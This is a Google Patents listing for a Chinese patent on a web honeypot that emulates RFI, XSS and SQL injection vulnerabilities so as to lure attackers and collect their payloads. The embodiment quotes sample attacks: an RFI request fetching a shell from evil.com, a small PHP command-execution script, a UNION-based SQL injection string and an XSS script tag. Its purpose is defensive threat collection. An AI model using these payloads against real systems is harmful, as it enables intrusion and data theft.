CN109508548B - Threat behavior collecting system and method based on simulator technology - Google Patents
Threat behavior collecting system and method based on simulator technology Download PDFInfo
- Publication number
- CN109508548B CN109508548B CN201811375932.9A CN201811375932A CN109508548B CN 109508548 B CN109508548 B CN 109508548B CN 201811375932 A CN201811375932 A CN 201811375932A CN 109508548 B CN109508548 B CN 109508548B
- Authority
- CN
- China
- Prior art keywords
- threat
- request
- module
- vulnerability
- http
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Links
Images
Classifications
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/57—Certifying or maintaining trusted computer platforms, e.g. secure boots or power-downs, version controls, system software checks, secure updates or assessing vulnerabilities
- G06F21/577—Assessing vulnerabilities and evaluating computer system security
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F2221/00—Indexing scheme relating to security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F2221/03—Indexing scheme relating to G06F21/50, monitoring users, programs or devices to maintain the integrity of platforms
- G06F2221/034—Test or assess a computer or a system
Abstract
The invention discloses a threat behavior collecting system based on a simulator technology, which comprises a Web application service module, a threat identification module, a vulnerability simulation module and a storage module, wherein the Web application service module is used for providing a threat behavior collection function; the Web application service module is connected with the threat identification module and the storage module, and the threat identification module is connected with the vulnerability simulation module. The system of the invention uses the simulator technology to collect the threat behaviors, identifies the threat data in the network, adopts the simulator to respond to the threats according to different identified threat types, simulates loopholes, achieves the purpose of collecting the threat data, avoids the reconstruction on the basis of an application system, belongs to the lightweight threat behavior collection technology, and can carry out threat behavior attack detection and threat behavior data analysis.
Description
Technical Field
The invention relates to the technical field of WEB security detection, in particular to a threat behavior collecting system and method based on a simulator technology.
Background
Among the network attacks, the attacks for web applications account for over 60%. The web application is exposed in a public network environment, and many applications have vulnerabilities, which can cause application data leakage and application service failure. Causing a loss to the owner of the web application. The threat behavior collecting technology is particularly necessary for better research and analysis on the attack behavior and better response to the attack threat behavior.
Disclosure of Invention
The invention aims to overcome the defects in the background technology and provides a threat behavior collecting system and method based on an emulator technology. Threat behavior attack detection and threat behavior data analysis can be performed.
In order to achieve the technical effects, the invention adopts the following technical scheme:
a threat behavior collecting system based on simulator technology comprises a Web application service module, a threat identification module, a vulnerability simulation module and a storage module; the Web application service module is connected with the threat identification module and the storage module, and the threat identification module is connected with the vulnerability simulation module;
the Web application service module is used for realizing Web application service and receiving an http request from the outside, wherein the http request comprises a GET request and a POST request, the Web application service module sends the received POST request to the storage module for storage and sends the received GET request to the threat identification module;
the threat identification module is used for carrying out threat identification on the parameters of the received GET request and delivering the received GET request to the vulnerability simulation module when RFI attack, XSS attack or SQL attack is identified;
the vulnerability simulation module is used for identifying attack content of payload in parameters of the received GET request, simulating a corresponding vulnerability execution result by using a simulation technology, then returning an http response with the vulnerability execution result to the requesting party, and when returning the http response with the vulnerability execution result to the requesting party, an attacker considers that the web service has (such as SQL or XSS) vulnerability and sends further http to attack the payload to implement next attack, so that the threat behavior collection system based on the simulator technology can obtain more valuable attack data.
Meanwhile, the invention also discloses a threat behavior collecting method based on the simulator technology, which comprises the following steps:
A. deploying the threat behavior collecting system based on the simulator technology in a public network;
B. a Web application service module of the threat behavior collection system based on the simulator technology receives an external http request and classifies the received http request;
C. if the received http request is a POST request, the Web application service module transmits the request to a storage module for storage;
if the received http request is a GET request, the Web application service module delivers the request to the threat identification module, and the step D is entered;
D. the threat identification module carries out threat identification on the received GET request parameters, and if the GET request parameters are identified to be an RFI threat request, an XSS threat request or an SQL threat request, the received GET request is delivered to the vulnerability simulation module;
E. the vulnerability simulation module identifies the attack content of payload in the received GET request parameters, simulates a corresponding vulnerability execution result by using a simulator technology, then returns an http response with the vulnerability execution result to the requesting party and stores the threat behavior data in the storage module;
F. and carrying out threat behavior data collection in the storage module.
Further, the step E specifically includes the following steps:
E1. the vulnerability simulation module analyzes payload in the received GET request parameters, and if the GET request is an RFI threat request, a remote file is obtained;
E2. reading the content of the obtained remote file or payload in the parameters of the SQL threat request or the XSS threat request, and decoding the content by base64 to obtain a decoding result;
E3. the vulnerability simulation module carries out rule matching on the decoding result line by line and matches the attack type of the request;
E4. simulating a corresponding attack execution result by using a simulator technology, and then returning an http response with the attack execution result to the requester;
E5. and saving the data of the attacked payload to a storage module.
Further, in the step D, if the identified type of the threat request is another threat request, a regular response is made to the requester, where the another threat request is a threat request of an RFI threat request, an XSS threat request, or an SQL threat request.
Further, if the http request received in the step C is a POST request, the Web application service module will send the request to the storage module for storage, and then will make a conventional response to the requester
Compared with the prior art, the invention has the following beneficial effects:
the threat behavior collecting system and method based on the simulator technology, disclosed by the invention, have the advantages that the simulator technology is used for collecting threat behaviors, threat data in a network are identified, the simulator is adopted to respond to threats according to different identified threat types, loopholes are simulated, the purpose of collecting the threat data is achieved, the improvement on the basis of an application system is avoided, the system belongs to the lightweight threat behavior collecting technology, the threat behavior attack detection and the threat behavior data analysis can be carried out, and the application range is wider.
Drawings
FIG. 1 is a schematic diagram of a threat behavior gathering system of the present invention based on simulator technology.
FIG. 2 is a flow chart diagram of the threat behavior gathering method based on simulator technology.
Fig. 3 is a schematic flow chart illustrating how a vulnerability simulation module is used to simulate a vulnerability according to an embodiment of the present invention.
Detailed Description
The invention will be further elucidated and described with reference to the embodiments of the invention described hereinafter.
Example (b):
the first embodiment is as follows:
as shown in fig. 1, a threat behavior collecting system based on simulator technology includes a Web application service module, a threat identification module, a vulnerability simulation module, and a storage module; the Web application service module is connected with the threat identification module and the storage module, and the threat identification module is connected with the vulnerability simulation module.
Specifically, the Web application service module is used for implementing a Web application service, receiving an http request from the outside, and specifically supporting GET and POST requests. The Web application service module directly delivers the received external POST request to the storage module for storage, and delivers the external GET request to the threat identification module.
And the threat identification module is used for carrying out threat identification on the parameter of the GET request, and if RFI, XSS and SQL attacks exist, the parameter is handed to the vulnerability simulation module.
The vulnerability simulation module is used for identifying the attack content of payload in the requested parameters, simulating a corresponding vulnerability execution result by using a simulation technology, and then returning an http response with the vulnerability execution result to the requesting party. The attacker may think that the web service has a vulnerability (e.g., SQL or XSS), and may send a further http attack payload to implement a next attack, so that the threat behavior collection system can obtain more valuable attack data.
The storage module is used for storing the corresponding request data and the threat behavior data so as to facilitate the subsequent collection of the threat behavior data.
When the system works, the Web application service module receives an external HTTP request, and for the HTTP POST request, the original RAW data of the POST request is directly sent to the storage module to be stored, and a normal response is given to a requester;
and if the HTTP GET request is judged to be an RFI or SQL or XSS threat request, the request is sent to a vulnerability simulation module to simulate a vulnerability request by using a simulator and respond, wherein if the request does not belong to the RFI or SQL or XSS threat request, the request is judged to be other threat requests, and for other threat requests, conventional response is carried out to the requester, namely, a response of a normal page is returned to the requester, and the response is similar to the response of the POST request.
When the vulnerability simulation module uses the simulator to simulate the vulnerability request and respond, the http parameters are firstly analyzed, the values of the parameters are obtained, then rule matching is specifically carried out, whether the matching is attack or not and the attack type is determined, then the simulator technology is used for simulating the corresponding attack execution result, and the response containing the code execution result is returned to the requesting party, namely the vulnerability simulated by the simulator is utilized and then the code is executed to feed back system information to an attacker.
And finally, storing the threat data, namely the attacked payload content, in a storage module so as to collect threat behavior data at a later period.
Example two
As shown in fig. 2, a threat behavior gathering method based on a simulator technique specifically includes the following steps:
the method comprises the following steps: deploying the threat behavior collecting system based on the simulator technology in a public network;
step two: the Web application service module receives an external HTTP request, and directly delivers original (RAW) data of the POST request to the storage module for storage for the HTTP POST request, and gives a normal response to a requester, such as:
HTTP/1.1 200 OK
Cache-Control:private
Content-Type:text/html;Charset=GB2312
Server:Microsoft-IIS/10.0
X-Powered-By:ASP.NET
Date:Wed,14 Nov 2018 10:39:00 GMT
Content-Length:67
<html>
<body>
< p > this is a normal response >
</body>
</html>
And the HTTP GET request is sent to a threat identification module for threat identification and classification. Taking Remote File Inclusion (RFI) as an example, if the server response content expected by the attacker is the corresponding result executed by implementing the attack code, the attack request sent by the attacker is as follows:
GET http://example.com/vulnerable.phpcolor=http://evil.com/shell.php
the http request is a GET request, and the value of the request parameter color is the url address of a remote file (shell.
Step three: and the threat identification module receives the request and carries out threat identification, if the request is judged to be an RFI or SQL or XSS threat request, the request is sent to the vulnerability simulation module to be responded by using a simulator to simulate the vulnerability request, if the request does not belong to the RFI or SQL or XSS threat request, the request is judged to be other threat requests, and for other threat requests, conventional response is carried out to the requester, namely, a response of a normal page is returned to the requester, and the response is similar to the response of the POST request.
The threat identification module can simply use rules such as:
if'=http://'in request:
handle_rfi_request()
if the http exists in the detection request parameter: /"can be simply judged as an RFI attack.
Step four: attack recognition and response, the specific flow is shown in fig. 3:
and the vulnerability simulation module analyzes the http parameter for the received request to obtain the value of the parameter color.
The color value of the attack request GET http:// example. com/vulnerable. phpcolor ═ http:// evil.com/shell. php as described above is specifically: http:// evil.com/shell.php.
When the vulnerability simulation module judges that url connection exists in the parameters, the vulnerability simulation module tries to send an http request http:// evil.com/shell.php, obtains a shell.php file, reads the content of the file after obtaining the file, and performs base64 decoding, wherein the decoding result obtained in the embodiment is as follows:
<?php
$un=@php_uname();
$up=system(uptime);
echo"uname-a:$un<br>"
echo"uptime:$up<br>"
?>
then the vulnerability simulation module performs line-by-line rule matching on the simulator, and when the @ php _ name () is matched, the result corresponding to the rule stored in the system is inquired;
such as: linux localhost, localdomain 3.10.0-693.el7.x86_64#1SMP Tue Aug 2221: 09:27UTC 2017x86_64x86_64x86_64 GNU/Linux
Specifically, the specific form of the rule stored in the system in this embodiment is:
the emulator program looks up the match in the upper table with a key, extracts the result when php _ name () is matched, and the rule can be stored in a system file or database.
Then, vulnerability response is carried out:
if $ un is replaced by the above result when echo is matched, and then the http response result is returned to the attacker, the response result in this embodiment is as follows:
HTTP/1.1 200 OK
Server:nginx/1.1.19
Date:Wed,14 Nov 2018 09:12:01 GMT
Content-Type:text/html;charset=UTF-8
Content-Length:10
Connection:keep-alive
uname-a:GNU/Linux","Linux my.leetserver.com 2.6.18-6-k7<br>
uptime:19:42:43up 3days,22:39,1user,load average:0.9,0.2 0.1<br>
finally, threat behavior data is stored, wherein the threat data is payload of an attack, specifically, PHP codes in a remote file (shell. PHP) are specifically stored for an RFI threat request, and SQL injection statements are specifically stored for an SQL threat request, for example:
1 union select 1,2,table_name from information_schema.tables where table_schema=schema_name
for the XSS threat request, the specific storage content is XSS attack payload as follows:
<script>alert('xss')</script>
step five: and carrying out threat behavior data collection on the public network.
It will be understood that the above embodiments are merely exemplary embodiments taken to illustrate the principles of the present invention, which is not limited thereto. It will be apparent to those skilled in the art that various modifications and improvements can be made without departing from the spirit and substance of the invention, and these modifications and improvements are also considered to be within the scope of the invention.
Claims (3)
1. A threat behavior collecting method based on simulator technology is characterized by comprising the following steps:
deploying a threat behavior collecting system based on a simulator technology in a public network; the system comprises a Web application service module, a threat identification module, a vulnerability simulation module and a storage module;
a Web application service module of the threat behavior collection system based on the simulator technology receives an external http request and classifies the received http request;
if the received http request is a POST request, the Web application service module transmits the request to a storage module for storage;
if the received http request is a GET request, the Web application service module delivers the request to the threat identification module, and the step D is entered;
the threat identification module carries out threat identification on the received GET request parameters, and if the GET request parameters are identified to be an RFI threat request, an XSS threat request or an SQL threat request, the received GET request is delivered to the vulnerability simulation module;
the vulnerability simulation module identifies the attack content of payload in the received GET request parameters, simulates a corresponding vulnerability execution result by using a simulator technology, then returns an http response with the vulnerability execution result to the requesting party and stores the threat behavior data in the storage module;
E1. the vulnerability simulation module analyzes payload in the received GET request parameters, and if the GET request is an RFI threat request, a remote file is obtained;
E2. reading the content of the obtained remote file or payload in the parameters of the SQL threat request or the XSS threat request, and decoding the content by base64 to obtain a decoding result;
E3. the vulnerability simulation module carries out rule matching on the decoding result line by line and matches the attack type of the request;
E4. simulating a corresponding attack execution result by using a simulator technology, and then returning an http response with the attack execution result to the requester;
E5. storing the data of the attacked payload to a storage module;
and carrying out threat behavior data collection in the storage module.
2. The method for collecting threat behaviors based on simulator technology according to claim 1, wherein in step D, if the identified type of the threat request is other threat request, a regular response is made to the requester, wherein the other threat request is a threat request of RFI threat request, XSS threat request or SQL threat request.
3. The method for collecting threat behaviors based on simulator technology of claim 1, wherein if the http request received in step C is a POST request, the Web application service module will send the request to the storage module for storage and then will make a regular response to the requester.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201811375932.9A CN109508548B (en) | 2018-11-19 | 2018-11-19 | Threat behavior collecting system and method based on simulator technology |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201811375932.9A CN109508548B (en) | 2018-11-19 | 2018-11-19 | Threat behavior collecting system and method based on simulator technology |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN109508548A CN109508548A (en) | 2019-03-22 |
| CN109508548B true CN109508548B (en) | 2022-06-03 |
Family
ID=65748947
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN201811375932.9A Active CN109508548B (en) | 2018-11-19 | 2018-11-19 | Threat behavior collecting system and method based on simulator technology |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN109508548B (en) |
Families Citing this family (1)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN114143042A (en) * | 2021-11-09 | 2022-03-04 | 奇安信科技集团股份有限公司 | Vulnerability simulation method and device, computer equipment and storage medium |
Citations (6)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| WO2014041561A2 (en) * | 2012-08-31 | 2014-03-20 | Iappsecure Solutions Pvt. Ltd. | A system for analyzing applications accurately for finding security and quality issues |
| CN104426850A (en) * | 2013-08-23 | 2015-03-18 | 南京理工大学常熟研究院有限公司 | Vulnerability detection method based on plug-in |
| CN104657659A (en) * | 2013-11-20 | 2015-05-27 | 腾讯科技(深圳)有限公司 | Storage cross-site attack script vulnerability detection method, device and system |
| CN105359157A (en) * | 2013-07-09 | 2016-02-24 | 国际商业机器公司 | A network security system |
| CN106951242A (en) * | 2017-03-10 | 2017-07-14 | 北京白帽汇科技有限公司 | A kind of generation method, equipment and the computing device of validating vulnerability program |
| CN108683685A (en) * | 2018-06-19 | 2018-10-19 | 三江学院 | A kind of cloud security CDN system and monitoring method for XSS attack |
Family Cites Families (12)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US8566943B2 (en) * | 2009-10-01 | 2013-10-22 | Kaspersky Lab, Zao | Asynchronous processing of events for malware detection |
| US8856935B2 (en) * | 2012-02-07 | 2014-10-07 | International Business Machines Corporation | Automatic synthesis of unit tests for security testing |
| CN104063309A (en) * | 2013-03-22 | 2014-09-24 | 南京理工大学常熟研究院有限公司 | Web application program bug detection method based on simulated strike |
| GB2519159A (en) * | 2013-10-14 | 2015-04-15 | Ibm | Security testing of web applications with specialised payloads |
| CN103647678A (en) * | 2013-11-08 | 2014-03-19 | 北京奇虎科技有限公司 | Method and device for online verification of website vulnerabilities |
| WO2015142697A1 (en) * | 2014-03-15 | 2015-09-24 | Belva Kenneth F | Methods for determining cross-site scripting and related vulnerabilities in applications |
| US20160028605A1 (en) * | 2014-05-30 | 2016-01-28 | Reylabs Inc. | Systems and methods involving mobile linear asset efficiency, exploration, monitoring and/or display aspects |
| CN104537307A (en) * | 2014-12-23 | 2015-04-22 | 北京奇虎科技有限公司 | Method and system for detecting website vulnerability |
| CN104732144B (en) * | 2015-04-01 | 2017-06-23 | 河海大学 | A kind of remote code injection loophole detection method based on pseudo- agreement |
| CN105678170B (en) * | 2016-01-05 | 2018-05-29 | 广东工业大学 | A kind of method of dynamic detection XSS loopholes |
| CN108667770B (en) * | 2017-03-29 | 2020-12-18 | 腾讯科技(深圳)有限公司 | Website vulnerability testing method, server and system |
| CN107832617B (en) * | 2017-09-15 | 2021-03-30 | 北京知道未来信息技术有限公司 | Black box detection method and device for PHP code execution vulnerability |
-
2018
- 2018-11-19 CN CN201811375932.9A patent/CN109508548B/en active Active
Patent Citations (6)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| WO2014041561A2 (en) * | 2012-08-31 | 2014-03-20 | Iappsecure Solutions Pvt. Ltd. | A system for analyzing applications accurately for finding security and quality issues |
| CN105359157A (en) * | 2013-07-09 | 2016-02-24 | 国际商业机器公司 | A network security system |
| CN104426850A (en) * | 2013-08-23 | 2015-03-18 | 南京理工大学常熟研究院有限公司 | Vulnerability detection method based on plug-in |
| CN104657659A (en) * | 2013-11-20 | 2015-05-27 | 腾讯科技(深圳)有限公司 | Storage cross-site attack script vulnerability detection method, device and system |
| CN106951242A (en) * | 2017-03-10 | 2017-07-14 | 北京白帽汇科技有限公司 | A kind of generation method, equipment and the computing device of validating vulnerability program |
| CN108683685A (en) * | 2018-06-19 | 2018-10-19 | 三江学院 | A kind of cloud security CDN system and monitoring method for XSS attack |
Non-Patent Citations (4)
| Title |
|---|
| CSSXC: Context-Sensitive Sanitization Framework for Web Applications against XSS Vulnerabilities in Cloud Environments;Shashank Gupta;《International Conference on Computational Modeling and Security (CMS 2016)》;20160521;第198-205页 * |
| Web应用漏洞扫描系统;王扬品等;《计算机系统应用》;20151215(第12期);全文 * |
| 基于HTML5 WebWorks组件的DDoS攻击方式和检测;刘麒;《计算机应用与软件》;20161231;第33卷(第12期);第296-300页 * |
| 基于渗透测试的跨站脚本漏洞检测方法研究;王强等;《计算机技术与发展》;20130310(第03期);全文 * |
Also Published As
| Publication number | Publication date |
|---|---|
| CN109508548A (en) | 2019-03-22 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| US11516248B2 (en) | Security system for detection and mitigation of malicious communications | |
| CN112567710B (en) | System and method for contaminating phishing campaign responses | |
| US10375102B2 (en) | Malicious web site address prompt method and router | |
| US20200028859A1 (en) | Systems and methods for automated retrieval, processing, and distribution of cyber-threat information | |
| CN109495377B (en) | Instant E-mail embedded URL credit confirming equipment, system and method | |
| CN102624705B (en) | A kind of intelligent image verification method and system | |
| US20170155666A1 (en) | Attracting and analyzing spam postings | |
| US8862675B1 (en) | Method and system for asynchronous analysis of URLs in messages in a live message processing environment | |
| CN102710645A (en) | Method and system for detecting phishing website | |
| CN104809404A (en) | Data layer system of information security attack-defense platform | |
| CN106254553A (en) | A kind of document transmission processing method and apparatus | |
| CN102638448A (en) | Method for judging phishing websites based on non-content analysis | |
| CN101087259A (en) | A system for filtering spam in Internet and its implementation method | |
| CN101877710A (en) | Proxy gateway anti-virus implement method, pre-sorter and proxy gateway | |
| CN103810268B (en) | Search result recommendation information loading method, device and system and URL detection method, device and system | |
| CN102999723B (en) | The data defence component generation method that Initiative Defense XSS attacks and device thereof | |
| CN103067387B (en) | A kind of anti-phishing monitoring system and method | |
| CN104202345A (en) | Verification code generating method, device and system | |
| CN114679292B (en) | Honeypot identification method, device, equipment and medium based on network space mapping | |
| CN112347165B (en) | Log processing method and device, server and computer readable storage medium | |
| CN111147489B (en) | Link camouflage-oriented fishfork attack mail discovery method and device | |
| CN102752326A (en) | Method, client, server and system for processing data in file downloading | |
| CN104753730A (en) | Vulnerability detection method and device | |
| CN102624687A (en) | Networking program user authentication method based on mobile terminal | |
| CN107276986B (en) | Method, device and system for protecting website through machine learning |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| GR01 | Patent grant | ||
| GR01 | Patent grant |